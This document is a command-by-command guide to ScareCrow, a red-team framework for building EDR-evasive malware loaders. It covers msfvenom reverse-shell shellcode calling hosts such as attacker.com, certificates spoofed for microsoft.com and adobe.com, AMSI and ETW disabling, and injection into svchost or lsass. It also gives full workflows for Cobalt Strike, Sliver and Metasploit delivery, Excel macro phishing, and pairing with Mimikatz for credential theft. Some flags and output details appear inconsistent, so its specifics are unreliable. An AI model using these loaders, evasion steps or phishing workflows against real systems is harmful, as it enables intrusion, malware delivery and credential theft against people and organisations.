ScareCrow

ScareCrow is a powerful payload creation framework designed to generate EDR-evasive loaders that bypass detection through code signing, process injection, and advanced execution techniques. Built by Optiv, it supports multiple delivery mechanisms and loader types for flexible red team operations.

Installation

Prerequisites

# Install required dependencies (Debian/Ubuntu)
sudo apt-get install mingw-w64 osslsigncode openssl golang-go

# On macOS
brew install mingw-w64 osslsigncode openssl go

# On CentOS/RHEL
sudo yum install mingw-w64-gcc mingw-w64-gcc-c++ openssl golang

Build from Source

# Clone ScareCrow repository
git clone https://github.com/optiv/ScareCrow.git
cd ScareCrow

# Build the binary (requires Go 1.16+)
go build -o ScareCrow main.go

# Verify installation
./ScareCrow -h

Quick Install via Go

# Install directly to $GOPATH/bin
go install github.com/optiv/ScareCrow@latest

# Add to PATH if needed
export PATH=$PATH:$(go env GOPATH)/bin

Quick Start

Generate a basic loader from msfvenom shellcode:

# Generate shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw > payload.bin

# Create signed loader
./ScareCrow -I payload.bin -domain microsoft.com -delivery http

# Output files created:
# - loader.exe (main loader)
# - loader.exe.sig (signature)
# - loader.c (C source code)

Loader Types

Type	Flag	Description	Best For
Binary	`-Loader binary`	Standalone executable	Direct execution, reverse shells
DLL	`-Loader dll`	Dynamic library for sideloading	DLL injection, process hollowing
COM Object	`-Loader control`	COM control object (.scr)	Screensaver execution, UAC bypass
Excel Macro	`-Loader excel`	Excel-based delivery	Phishing documents, macro execution
MSIExec	`-Loader msiexec`	Windows Installer wrapper	Code execution via MSI, UAC bypass
WScript	`-Loader wscript`	Windows Script Host wrapper	VBScript/JScript execution, LOLBin abuse

DLL Side-Loading Example

# Create DLL for side-loading
./ScareCrow -I payload.bin -Loader dll -domain adobe.com -delivery http

# Use legitimate application to load malicious DLL
# Place loader.dll next to legitimate application
# When legitimate app runs, it loads our malicious DLL

Excel Macro Delivery

# Generate Excel-compatible loader
./ScareCrow -I payload.bin -Loader excel -domain microsoft.com

# Creates VBA macro that executes loader
# Can be embedded in .xls/.xlsm documents

Input Formats

Raw Shellcode Input

# Using -I flag for raw binary shellcode
./ScareCrow -I payload.bin -domain company.com

# Generate from various shellcode sources
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 -f raw > payload.bin
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=8080 -f raw > shell.bin

Metasploit Integration

# Generate shellcode directly from msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 \
  -f raw | ./ScareCrow -I /dev/stdin -domain microsoft.com

# For 32-bit payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=target.com LPORT=4444 \
  -f raw > x86.bin && ./ScareCrow -I x86.bin

Cobalt Strike Shellcode

# Export from Cobalt Strike beacon
# Generate raw shellcode from beacon export

./ScareCrow -I beacon.bin -domain cloud.microsoft.com -delivery http

Code Signing

Domain-Based Certificate Cloning

# Sign with cloned certificate from domain
./ScareCrow -I payload.bin -domain microsoft.com -valid 365

# ScareCrow clones legitimate certificate from specified domain
# Creates trusted signature that bypasses SmartScreen

# Alternative domains for cloning:
# microsoft.com, apple.com, adobe.com, google.com, github.com

Certificate Options

# Sign without specific domain (self-signed)
./ScareCrow -I payload.bin

# Specify validity period (days)
./ScareCrow -I payload.bin -domain adobe.com -valid 90

# Use custom certificate (if available)
./ScareCrow -I payload.bin -domain company.com

Why Code Signing Matters

Signed loaders bypass numerous defenses:

SmartScreen warning suppression
Code signature validation in EDRs
Windows Defender Application Guard bypass
Trust indicators in file properties

Encryption

Encryption Modes

# AES-256 encryption (default, recommended)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode AES

# ELZMA compression + encryption (smaller file size)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode ELZMA

# XOR encryption (fastest, less secure)
./ScareCrow -I payload.bin -encryptionmode XOR

File Size Comparison

# AES: ~180KB (best compatibility)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode AES

# ELZMA: ~120KB (compressed)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode ELZMA

# XOR: ~140KB (fast)
./ScareCrow -I payload.bin -encryptionmode XOR

Process Injection

Injection Techniques

# Self-injection (no parent process)
./ScareCrow -I payload.bin -injection self -domain microsoft.com

# Parent process injection (masquerade as another process)
./ScareCrow -I payload.bin -injection process -process svchost.exe

# Target specific process for injection
./ScareCrow -I payload.bin -injection process -process notepad.exe

Process Injection Tactics

# Inject into legitimate system processes
./ScareCrow -I payload.bin -injection process -process svchost.exe -domain microsoft.com
./ScareCrow -I payload.bin -injection process -process taskhostw.exe -domain adobe.com
./ScareCrow -I payload.bin -injection process -process explorer.exe -domain apple.com

# Self-injection for standalone execution
./ScareCrow -I payload.bin -injection self -domain microsoft.com

Process Selection Tips

svchost.exe - System service host (trusted)
taskhostw.exe - Task Scheduler host (legitimate)
explorer.exe - Windows Explorer (common)
winlogon.exe - Logon process (high privilege)
lsass.exe - Local Security Authority (protected)

Delivery Options

HTTP Delivery

# Remote URL retrieval
./ScareCrow -I payload.bin -delivery http -url http://attacker.com/loader.exe \
  -domain microsoft.com

# Staged delivery - loader downloads payload from URL
./ScareCrow -I payload.bin -delivery http

DNS Delivery

# DNS-based payload retrieval
./ScareCrow -I payload.bin -delivery dns -domain attacker.com

# Useful in restricted networks where HTTP is blocked
# Requires DNS exfiltration/command infrastructure

URL-Based Delivery

# Specify custom delivery URL
./ScareCrow -I payload.bin -url http://internal.corp/updates/loader.exe \
  -delivery http -domain microsoft.com

# File will be downloaded from specified URL at runtime

No Internet Delivery

# Embed payload directly (no remote retrieval)
./ScareCrow -I payload.bin -domain microsoft.com

# Useful for offline or isolated environments

EDR Evasion Techniques

ETW (Event Tracing for Windows) Patching

# Disable ETW logging
./ScareCrow -I payload.bin -domain microsoft.com -noetw

# Prevents Event Tracing for Windows from logging execution
# Avoids triggering ETW-based detection rules

AMSI Bypass

# Bypass AMSI (Antimalware Scan Interface)
./ScareCrow -I payload.bin -domain microsoft.com -noamsi

# Allows shellcode execution without AMSI scanning
# Particularly effective for PowerShell/VBS payloads

Sleep Obfuscation

# Obfuscate Sleep calls to evade timeout detection
./ScareCrow -I payload.bin -domain microsoft.com -nosleep

# Sleep API is hooked by many EDRs
# Obfuscation prevents detection of sleep patterns

Combined Evasion

# Maximum evasion configuration
./ScareCrow -I payload.bin -domain microsoft.com \
  -noetw -noamsi -nosleep -encryptionmode AES

# Combines multiple evasion techniques
# Most effective against modern EDR solutions

Additional Evasion

Direct syscall execution (bypasses hooked APIs)
Unhooking kernel32 functions
Hardware breakpoint detection bypass
Sandbox evasion checks
Timing-based detection avoidance

Advanced Options

Custom Passwords

# Use custom encryption password
./ScareCrow -I payload.bin -password "SecurePass123!" -domain microsoft.com

# Password-protects the generated loader

Console Output Control

# Show console window during execution
./ScareCrow -I payload.bin -console -domain microsoft.com

# Hide console (default for stealthy execution)
./ScareCrow -I payload.bin -domain microsoft.com

Sandbox Evasion

# Enable sandbox evasion checks
./ScareCrow -I payload.bin -domain microsoft.com

# Detects and avoids common sandbox environments
# Checks for: VirtualBox, VMware, Hyper-V, QEMU

File Output Control

# Specify custom output filename
./ScareCrow -I payload.bin -out custom_loader.exe -domain microsoft.com

# Change output directory
./ScareCrow -I payload.bin -o /tmp/output/ -domain microsoft.com

Complete Workflow Examples

Cobalt Strike Integration

# 1. Generate Cobalt Strike shellcode
# Export beacon -> generate shellcode -> save as cs.bin

# 2. Create ScareCrow loader
./ScareCrow -I cs.bin -domain microsoft.com -delivery http \
  -injection process -process svchost.exe -noetw -noamsi

# 3. Host on web server
# Place loader.exe on HTTP server

# 4. Deliver via social engineering
# Email, USB, shared drive, etc.

Sliver Integration

# 1. Generate Sliver implant shellcode
sliver > generate --mtls localhost --format shellcode > sliver.bin

# 2. Create loader
./ScareCrow -I sliver.bin -domain apple.com -encryptionmode ELZMA \
  -injection self -noetw

# 3. Execute on target
# ./loader.exe (connects back to Sliver server)

Metasploit Multi-Stage

# 1. Generate msfvenom shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 \
  LPORT=4444 -f raw > msfvenom.bin

# 2. Create signed loader
./ScareCrow -I msfvenom.bin -domain adobe.com -delivery http \
  -injection process -process explorer.exe -nosleep

# 3. Set up Metasploit listener
# use exploit/multi/handler
# set LHOST 10.10.10.10
# set LPORT 4444
# exploit

Excel-Based Phishing

# 1. Generate payload
./ScareCrow -I payload.bin -Loader excel -domain microsoft.com

# 2. Create Excel document
# Insert generated macro into Excel

# 3. Social engineer target
# Send as email attachment, mention "Enable Macros"

Troubleshooting

Build Errors

# Missing Go installation
# Solution: Install Go 1.16+ from golang.org

# Cannot find mingw-w64
# Solution: apt-get install mingw-w64

# openssl not found
# Solution: apt-get install openssl

Compilation Failures

# "Invalid argument" error
# Solution: Check shellcode validity - ensure raw binary format

# "Certificate error" when signing
# Solution: Verify domain is reachable, has valid certificate

# File generation issues
# Solution: Check write permissions in current directory

Payload Execution Issues

# Loader doesn't execute
# Solution: Verify shellcode format, try different injection method

# EDR blocking execution
# Solution: Enable -noetw -noamsi -nosleep flags

# Process injection fails
# Solution: Ensure target process exists, use -injection self as fallback

Size Issues

# Loader too large (> 10MB)
# Solution: Use -encryptionmode ELZMA to compress

# Output binary still detected
# Solution: Recombine with fresh domain signing, change encryption mode

Best Practices

Operational Security

Always use code signing with legitimate-looking domains
Rotate domains between campaigns
Test payloads in isolated lab environment first
Monitor for detection patterns on target systems
Use staged delivery when network allows

Evasion Strategy

Combine multiple evasion techniques (-noetw, -noamsi, -nosleep)
Vary loader types between targets
Use process injection into trusted system processes
Implement sleep obfuscation for long-running operations
Test against target’s specific EDR solution

Payload Selection

Match shellcode size to target constraints
Use x64 when possible (64-bit Windows is default)
Consider network bandwidth for large payloads
Test callback connectivity before deployment
Plan for multiple payload attempts

Post-Exploitation

Monitor injected process for suspicious behavior
Use encrypted communications for C2
Implement proper logging and audit trails
Clean up artifacts after operation completion
Document all activities for IR purposes

Tool	Purpose	Use Case
Donut	Shellcode generation from .NET	.NET assembly execution
PEzor	PE obfuscation and evasion	Binary obfuscation
Freeze	Anti-debug and anti-analysis	Detection evasion
NimCrypt2	Nim-based encryption	Alternative language approach
shhhloader	Shellcode loader framework	Custom loader development
Sliver	C2 framework alternative	Command and control
Cobalt Strike	Commercial C2 framework	Full-featured red team operations

Complementary Techniques

Use with Atomics Red Team for evasion testing
Combine with LOLBAS for execution
Integrate with Covenant C2 framework
Pair with Mimikatz for credential theft
Deploy alongside Empire/PowerEmpire